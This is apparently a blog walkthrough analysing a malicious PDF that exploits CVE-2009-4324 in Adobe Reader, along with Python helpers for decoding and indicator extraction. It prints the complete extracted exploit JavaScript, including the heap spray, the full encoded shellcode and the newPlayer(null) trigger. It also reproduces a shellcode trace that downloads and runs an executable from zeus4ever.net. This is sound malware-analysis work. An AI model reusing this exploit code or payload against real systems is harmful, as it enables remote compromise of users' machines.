Thursday, October 13, 2011

analyzing 8008bf0a06a0ba4dca1c881f4955acc8


Recently, I started analyzing pdf-malware. I got myself a pdf to analyze from malwaredomainlist.com; the hash of the pdf is 8008bf0a06a0ba4dca1c881f4955acc8



1. Strings
To be honest, there wasn't much I could make sense of. The only piece of information I obtained from the header was that the file adheres to the PDF 1.5 specification; I could also see the cross-reference table.


2. pdf.py from jsunpack
I used the pdf.py that ships with jsunpack and got the following output:


parsing 8008bf0a06a0ba4dca1c881f4955acc8.pdf
obj 1 0: 
tag Type                                          (TAG)
tag Catalog                                       (TAG)
tag Outlines = 2 0 R                              (TAGVAL)
tag Pages = 3 0 R                                 (TAGVAL)
tag OpenAction = 5 0 R                            (ENDTAG)
obj 2 0: 
tag Type                                          (TAG)
tag Outlines                                      (TAG)
tag Count = 0                                     (ENDTAG)
obj 3 0: 
tag Type                                          (TAG)
tag Pages                                         (TAG)
tag Kids = 4 0 R]                                 (TAGVAL)
tag Count = 1                                     (ENDTAG)
obj 4 0: 
tag Type                                          (TAG)
tag Page                                          (TAG)
tag Parent = 3 0 R                                (TAGVAL)
tag MediaBox = 0 0 612 792]                       (ENDTAG)
obj 5 0: 
tag Type                                          (TAG)
tag Action                                        (TAG)
tag S                                             (TAG)
tag JavaScript                                    (TAG)
tag JS = 6 0 R                                    (ENDTAG)
obj 6 0: 
tag Length = 2317                                 (TAGVAL)
tag Filter                                        (TAGVAL)
tag FlateDecode                                   (TAG)
tag ASCIIHexDecode                                (ENDTAG)
obj trailer: 
tag Size = 7                                      (TAGVAL)
tag Root = 1 0 R                                  (ENDTAG)
Found JavaScript (delayed) in 1 0 (0 bytes)
children [['Outlines', '2 0'], ['Pages', '3 0'], ['OpenAction', '5 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Catalog', ''], ['TAGVAL', 'Outlines', '2 0 R'], ['TAGVAL', 'Pages', '3 0 R'], ['ENDTAG', 'OpenAction', '5 0 R']]
indata = <</T#79#70#65/C#61#74a#6c#6fg/Ou#74#6c#69n#65#73 2 0 R/Pag#65s 3 0 R/#4fp#65#6e#41#63t#69#6f#6e 5 0 
Found JavaScript (delayed) in 5 0 (0 bytes)
children [['JS', '6 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Action', ''], ['TAG', 'S', ''], ['TAG', 'JavaScript', ''], ['ENDTAG', 'JS', '6 0 R']]
indata = <</#54ype/Ac#74#69#6f#6e/#53/Jav#61S#63#72ip#74/#4a#53 6 0 R>>
Found JavaScript in 6 0 (2090 bytes)
children []
tags [['TAGVAL', 'Length', '2317'], ['TAGVAL', 'Filter', ''], ['TAG', 'FlateDecode', ''], ['ENDTAG', 'ASCIIHexDecode', '']]
indata = <</Le#6eg#74h 2317/F#69lt#65#72[/#46late#44#65#63#6fd#65/A#53C#49IHex#44#65#63#6f#64e]>>streamxYY6 q
Wrote JavaScript (2177 bytes -- 87 headers / 2090 code) to file 8008bf0a06a0ba4dca1c881f4955acc8.pdf.out




OK, so I haven't had to do much: the JavaScript in this file has already been decompressed and written out to another file.


Here's what I get:


c = []; zzzpages.push(c); this.numPages = zzzpages.length;


//jsunpack End PDF headers
var qdxIsPARawijkD = unescape("%uc3db%u74d9%uf424%u3158%ubbc9%ub4e1%u9ca2%u5eb1%u5831%u8318%u04c0%u5803%u56f5%u7757%ucce5%ubbd2%u97cc%u875b%ud7cf%uf2a8%u3556%ue92a%u526d%u1120%u5d92%ua2c7%u3bf5%uf8b1%u04f8%u676b%uec9b%u4179%u1c0e%uf497%u3304%u66be%u7276%u6352%u66d3%uf4bf%u1dfa%ue955%u981b%u6f30%u0cf1%udac9%u7d81%ud21c%u247b%u813b%u4369%ud1cf%uf94d%u3310%u3edc%ud1a8%u2380%u9de9%u9c4c%ua5d4%u48be%uf6cb%uea03%u40b1%u9103%ufb1e%u5aa3%u6a8c%u7a51%u1634%udc0f%ubc4f%u8435%u5bbd%u6fd3%u38d0%ue1f1%ue1ce%uef62%ueea7%ud011%ud849%u48b0%uc030%ufe9d%u3a88%u3147%u066b%u8c95%u1087%u7f59%ub8cc%u19c0%ue416%ud678%u03f8%uf0db%u57ea%uac3a%u50ea%uc726%u4db5%ud413%ubb7f%ud4fd%u62f5%u739c%u6230%u7f29%u4ee5%u1dcf%u8dfb%u8476%u3456%u7e41%u086c%ue798%uf2bf%uad08%u37f6%ue34a%u0160%u35f4%u3b1f%ufca1%u62fc%u9fbd%u5f34%uaaf2%u2ba3%uebcf%ud71e%u41b8%u7d07%u2937%ue7de%u8bd1%u05e3%udfd4%u2cea%ue23e%u3aee%uf742%u24fb%uf464%u9c11%uef78%udd07%u2d8c%uf527%u3490%ufc25%u2983%u986e%u5a9d%u4778%u67c0%ue17d%u79de%uff72%u8813%ufc98%u9653%u28c6%u9155%u0704%u9969%u501c%ube62%u383b%ud498%ucf49%udc96%ufc2b%uf69d%u0b91%u0ecf%u02dc%u0cf7%u1dd2%u1fd8%u1d18%u463e%uaa8b%u09ca%u7c76%u9d1d%uf5f1%u1b4f%u8c9b%ueffc%u1906%u6267%u8be7%uf602%u30d8%u9aad%u9945%u1b48%u65ef");
var EdDashDIgmMARzTFDgSvTTZUlJuZmRU = unescape("%u0c0c%u0c0c");
var TyhHR = unescape("%u0c0c%u0c0c%u4367%u6345%u6958%u6c69%u5859%u704e%u444d%u594f%u784e%u6353%u5457%u784e%u6972%u7265%u5a7a%u6852%u5157%u6d62%u6879%u6c77%u6e55%u5356%u7242%u6648%u456b%u6a58%u6f79%u7a45%u7874%u5456%u6c66%u7844%u764b%u6574");


while(EdDashDIgmMARzTFDgSvTTZUlJuZmRU.length <= 32768) EdDashDIgmMARzTFDgSvTTZUlJuZmRU+=EdDashDIgmMARzTFDgSvTTZUlJuZmRU;
EdDashDIgmMARzTFDgSvTTZUlJuZmRU=EdDashDIgmMARzTFDgSvTTZUlJuZmRU.substring(0,32768 - qdxIsPARawijkD.length);


memory=new Array();


for(i=0;i<0x2000;i++) {
memory[i]= EdDashDIgmMARzTFDgSvTTZUlJuZmRU + qdxIsPARawijkD;
}


util.printd("LvdryEwfMTmeCphVejMYFrqjrtGAtOoXRupB", new Date());
util.printd("ZnKRrNewyQTUFCwqObcZXLUsCASjMnaXIElD", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(TyhHR, new Date());




A few observations:

  • The "%u0c0c%u0c0c" string suggests a NOP sled for a heap overflow. The "while" loop builds a sled that is then trimmed to 32768 minus the shellcode length, so each sprayed block is exactly 32768 characters. "qdxIsPARawijkD" appears to be the shellcode that does the actual work.
  • Just before the "//jsunpack End PDF headers" comment there is some code that pdf.py adds automatically. From what I have read so far, that stub is needed for the exploit to load when you run the JS in something like SeaMonkey.
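To check the observations above, here is an added Python example (my own code, not from the post or from jsunpack) that decodes %uXXXX strings the way unescape() lays them out in memory and reproduces the sled-sizing arithmetic of the while/substring lines. The sled seed and the first eight code units of the shellcode are copied from the script above; the resulting sizes are my own computation from the script, not values the post states.

```python
import re

# %uXXXX escapes as produced by JavaScript's escape()/unescape(): one 16-bit
# UTF-16 code unit each, stored little-endian in the engine's string buffer.
U_ESC = re.compile(r"%u([0-9A-Fa-f]{4})")

# Constructed sample input: the sled seed and the first eight code units of
# qdxIsPARawijkD, copied from the script above (the full string is 200 units).
SLED_SEED = "%u0c0c%u0c0c"
SHELLCODE_PREFIX = "%uc3db%u74d9%uf424%u3158%ubbc9%ub4e1%u9ca2%u5eb1"


def unescape_u(s: str) -> bytes:
    """Return the bytes a %u-escaped string occupies in memory (UTF-16LE)."""
    out = bytearray()
    for m in U_ESC.finditer(s):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def code_units(s: str) -> int:
    """Length of the string as JavaScript sees it (16-bit code units)."""
    return len(U_ESC.findall(s))


def spray_block(seed_units: int, shellcode_units: int, target: int = 32768) -> dict:
    """Reproduce the sled sizing from the script:
         while (sled.length <= target) sled += sled;
         sled = sled.substring(0, target - shellcode.length);
    and report the layout of one sprayed block (memory[i] = sled + shellcode)."""
    sled = seed_units
    while sled <= target:                         # doubles 2 -> 4 -> ... -> 65536
        sled *= 2
    sled = min(sled, target - shellcode_units)    # substring() truncates
    block = sled + shellcode_units
    return {
        "sled_units": sled,
        "block_units": block,                     # always exactly `target`
        "block_bytes": block * 2,                 # 64 KiB per block in UTF-16
        "shellcode_offset_bytes": sled * 2,       # where the decoder stub starts
    }


if __name__ == "__main__":
    print(unescape_u(SLED_SEED).hex())            # 0c0c0c0c
    print(unescape_u(SHELLCODE_PREFIX).hex())     # db c3 d9 74 24 f4 58 31 ...
    layout = spray_block(code_units(SLED_SEED), 200)
    print(layout, "x 0x2000 blocks =", layout["block_bytes"] * 0x2000 // 2**20, "MiB")
```

The decoded prefix, db c3 d9 74 24 f4 58 31 c9 ..., is the same byte sequence the disassembly in section 4 starts with (dbc3, d97424f4, 58, 31c9), which confirms the little-endian reading of the %u escapes. With the full 200-unit shellcode every block is 32568 sled units plus 200 shellcode units, i.e. 64 KiB with the decoder stub 65136 bytes in, and the 0x2000-element array nominally asks for 512 MiB. Those 200 units are 400 bytes, which matches the decoder loop below: 0x18 (24) bytes of stub plus 0x5e (94) dwords to decode.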





3. Finding the JavaScript entry point
I used pdf-parser by Didier Stevens; the following is part of its output.


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 3 0 R, 5 0 R
 [(2, '<<'), (2, '/T#79#70#65'), (2, '/C#61#74a#6c#6fg'), (2, '/Ou#74#6c#69n#65#73'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Pag#65s'), (1, ' '), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/#4fp#65#6e#41#63t#69#6f#6e'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]


 <<
   /Type /Catalog
   /Outlines 2 0 R
   /Pages 3 0 R
   /OpenAction 5 0 R
 >>


obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54ype'), (2, '/Ac#74#69#6f#6e'), (2, '/#53'), (2, '/Jav#61S#63#72ip#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]


<<
  /Type /Action
  /S /JavaScript
  /JS 6 0 R
>>


obj 6 0
 Type: 
 Referencing: 
 Contains stream
 [(2, '<<'), (2, '/Le#6eg#74h'), (1, ' '), (3, '2317'), (2, '/F#69lt#65#72'), (2, '['), (2, '/#46late#44#65#63#6fd#65'), (2, '/A#53C#49IHex#44#65#63#6f#64e'), (2, ']'), (2, '>>'), (1, '\r\n')]


<<
 /Length 2317
 /Filter [
 /FlateDecode /ASCIIHexDecode]
>>


As you can see above, /OpenAction points to the object that contains the JavaScript, so the JS executes without any user intervention. "/OpenAction" is obfuscated as "/#4fp#65#6e#41#63t#69#6f#6e", which is where pdf-parser's name decoding comes in handy.
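Decoding the #xx escapes is mechanical, and it is worth automating because a name spelled as /#4fp#65#6e#41#63t#69#6f#6e is itself a strong signal: nothing legitimate bothers to hex-escape plain letters. The following is an added Python example, my own code rather than pdf-parser's or jsunpack's; the three dictionaries are copied from the output above, and the watchlist of names is an assumption I chose for triage.

```python
import re

# PDF name object: "/" followed by regular characters; "#xx" inside a name is a
# hex-escaped byte, which is what this sample abuses for every key.
NAME_RE = re.compile(r"/([^\s()<>\[\]{}/%]*)")
HEX_RE = re.compile(r"#([0-9A-Fa-f]{2})")

# Constructed sample input: the three object dictionaries from the output above
# (the first one as pdf-parser reassembled it).
SAMPLE_DICTS = [
    "<</T#79#70#65/C#61#74a#6c#6fg/Ou#74#6c#69n#65#73 2 0 R/Pag#65s 3 0 R"
    "/#4fp#65#6e#41#63t#69#6f#6e 5 0 R>>",
    "<</#54ype/Ac#74#69#6f#6e/#53/Jav#61S#63#72ip#74/#4a#53 6 0 R>>",
    "<</Le#6eg#74h 2317/F#69lt#65#72[/#46late#44#65#63#6fd#65/A#53C#49IHex#44#65#63#6f#64e]>>",
]

# Assumed watchlist: keys that let a PDF run code or act without a click.
WATCHLIST = {"/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch"}


def decode_name(raw: str) -> str:
    """Resolve #xx escapes in a name token (given without the leading slash)."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), raw)


def names_in(dict_src: str) -> list:
    """All names in a dictionary source as (decoded_name, used_escapes)."""
    return [("/" + decode_name(m.group(1)), "#" in m.group(1))
            for m in NAME_RE.finditer(dict_src)]


def triage(dicts) -> dict:
    """Flag watchlisted names and count how many names were hex-obfuscated."""
    flagged, escaped, total = set(), 0, 0
    for src in dicts:
        for name, was_escaped in names_in(src):
            total += 1
            escaped += was_escaped
            if name in WATCHLIST:
                flagged.add(name)
    return {"flagged": sorted(flagged), "escaped_names": escaped, "total_names": total}


if __name__ == "__main__":
    for src in SAMPLE_DICTS:
        print([name for name, _ in names_in(src)])
    print(triage(SAMPLE_DICTS))
```

For this file every one of the 14 names is escaped and the decoded set contains /OpenAction, /JavaScript and /JS, so a scanner that only greps for the plain strings would miss all three; decode first, then match.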


4. Understanding the shellcode


In order to understand the shellcode I used distorm and some regex in Python. The disassembly is as follows:


0x00000000 (02) dbc3                 FCMOVNB ST0, ST3
0x00000002 (04) d97424f4             FNSTENV [ESP-0xc]
; this is used as part of GetPC
0x00000006 (01) 58                   POP EAX
; at this point eax will have the eip.
0x00000007 (02) 31c9                 XOR ECX, ECX
; ecx set to 0
0x00000009 (05) bbe1b4a29c           MOV EBX, 0x9ca2b4e1
0x0000000e (02) b15e                 MOV CL, 0x5e
; counter set to 94
0x00000010 (03) 315818               XOR [EAX+0x18], EBX
; instruction at eax+0x18 are xored with 0x9ca2b4e1
0x00000013 (03) 83c004               ADD EAX, 0x4
0x00000016 (03) 0358f5               ADD EBX, [EAX-0xb]
0x00000019 (01) 56                   PUSH ESI
0x0000001a (01) 57                   PUSH EDI
0x0000001b (02) 77e5                 JA 0x2
[truncated]


So 0x18 = 24: that is the distance from the address popped into EAX to the first bytes that "XOR [EAX+0x18], EBX" decodes.


Analyzing the assembly shown above would be a lot faster if I could just run it somehow. Enter sctest from libemu. Skimming through the whole trace shows a lot of XORing and loop statements; towards the end I can see the imported functions being called, which gives an idea of what the shellcode is attempting to do.




FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 => 
         none;
     LPCSTR lpProcName = 0x0041715b => 
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x00416fb2 => 
           = "c:\WINDOWS\system32";
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
         none;
     LPCTSTR szURL = 0x0041716e => 
           = "http://www.zeus4ever.net/calc.exe";
     LPCTSTR szFileName = 0x00416fb2 => 
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x00416fb2 => 
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;


a.exe is downloaded from "http://www.zeus4ever.net/calc.exe", stored at "c:\WINDOWS\system32\a.exe" and executed. Of course, the executable is no longer available, so I guess that's it.
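As an added example (my own code, not part of libemu or this post), the following Python turns an sctest trace like the one above into a list of API calls with their string arguments, pulls out the URL and file paths as indicators, and checks for the download-then-execute sequence. The trace is copied from the output above; the API watchlists are my own assumption.

```python
import re

# Constructed sample: the libemu sctest trace from the section above (raw string
# so the Windows backslashes survive).
SAMPLE_TRACE = r"""
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x0041715b =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x00416fb2 =>
           = "c:\WINDOWS\system32";
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041716e =>
           = "http://www.zeus4ever.net/calc.exe";
     LPCTSTR szFileName = 0x00416fb2 =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x00416fb2 =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;
"""

STRING_ARG = re.compile(r'=\s*"(.*)"\s*;?\s*$')   # dereferenced string argument
RETVAL = re.compile(r"\)\s*=\s*(-?\w+)")           # ") = value;"
URL = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
WINPATH = re.compile(r"^[a-z]:\\", re.I)

# Assumed watchlists: a fetch API followed by an execution API is dropper behaviour.
FETCH_APIS = {"URLDownloadToFile", "URLDownloadToFileA", "URLDownloadToFileW"}
EXEC_APIS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"}


def parse_sctest(trace: str) -> list:
    """Parse the trace into [{"api", "strings", "ret"}, ...] in call order."""
    calls, current = [], None
    for raw in trace.splitlines():
        line = raw.strip()
        if line.endswith("("):                       # "RET [WINAPI] Name (" opens a call
            current = {"api": line[:-1].split()[-1], "strings": [], "ret": None}
        elif line.startswith(")") and current is not None:   # ") = value;" closes it
            m = RETVAL.match(line)
            current["ret"] = m.group(1) if m else None
            calls.append(current)
            current = None
        elif current is not None:
            m = STRING_ARG.search(line)
            if m:
                current["strings"].append(m.group(1))
    return calls


def extract_iocs(calls) -> dict:
    """Collect the API sequence plus every URL and Windows path the shellcode used."""
    urls, paths = set(), set()
    for c in calls:
        for s in c["strings"]:
            if URL.match(s):
                urls.add(s)
            elif WINPATH.match(s):
                paths.add(s)
    return {"apis": [c["api"] for c in calls], "urls": sorted(urls), "paths": sorted(paths)}


def dropped_and_run(calls) -> list:
    """Paths that were a download target and later an argument to an exec API."""
    downloaded, executed = set(), set()
    for c in calls:
        paths = {s for s in c["strings"] if WINPATH.match(s)}
        if c["api"] in FETCH_APIS:
            downloaded |= paths
        elif c["api"] in EXEC_APIS:
            executed |= paths & downloaded
    return sorted(executed)


if __name__ == "__main__":
    calls = parse_sctest(SAMPLE_TRACE)
    print(extract_iocs(calls))
    print("dropped and executed:", dropped_and_run(calls))
```

Matching the download target against the later exec argument (rather than just noting that both APIs appear) is what distinguishes a real dropper from shellcode that happens to import both functions; here the two resolve to the same buffer at 0x00416fb2.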




5. Finding out the vulnerability exploited
The vulnerability seems to be CVE-2009-4324; the exploit takes advantage of a use-after-free in the JavaScript module of Adobe Reader, triggered by calling self.media.newPlayer with a "null" argument.


Reference : http://vrt-blog.snort.org/2009/12/adobe-reader-medianewplayer-analysis.html




Many thanks to 0xff for his help.
